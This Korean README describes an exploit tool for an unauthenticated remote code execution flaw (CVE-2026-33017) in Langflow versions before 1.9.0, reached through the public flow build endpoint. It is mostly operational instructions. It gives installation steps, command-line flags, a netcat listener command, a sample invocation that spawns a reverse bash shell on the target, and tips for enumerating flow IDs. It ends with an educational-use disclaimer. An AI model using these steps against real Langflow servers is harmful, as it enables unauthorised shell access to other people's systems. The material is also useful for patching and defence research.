
Langflow <1.9.0에서의 인증되지 않은 원격 코드 실행(RCE) (CVE-2026-33017) 익스플로잇
Langflow의 build_public_tmp 엔드포인트를 통한 원격 코드 실행.
대상에 리버스 쉘을 실행하는 공개 플로우 빌드 엔드포인트를 통한 익스플로잇.
httpx 라이브러리설치:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : Langflow 인스턴스의 기본 URL (예: https://flow.example.com/)-l, --lhost : 리버스 쉘을 받을 IP 주소-p, --lport : 리버스 쉘을 위한 리스닝 포트-f --flow-id : 대상 플로우 ID (필수 – /api/v1/flows/ 또는 UI에서 확인)-c --client-id : 세션 식별을 위한 client_id 쿠키 값리스너 시작:
nc -nlvp 9001
익스플로잇 실행:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
성공하면 대화형 bash 쉘을 얻습니다.
flow-id가 필요합니다. GET /api/v1/flows를 통해 모든 플로우를 나열하거나 브라우저 URL에서 복사하세요.MIT – 교육 및 윤리적 보안 연구용.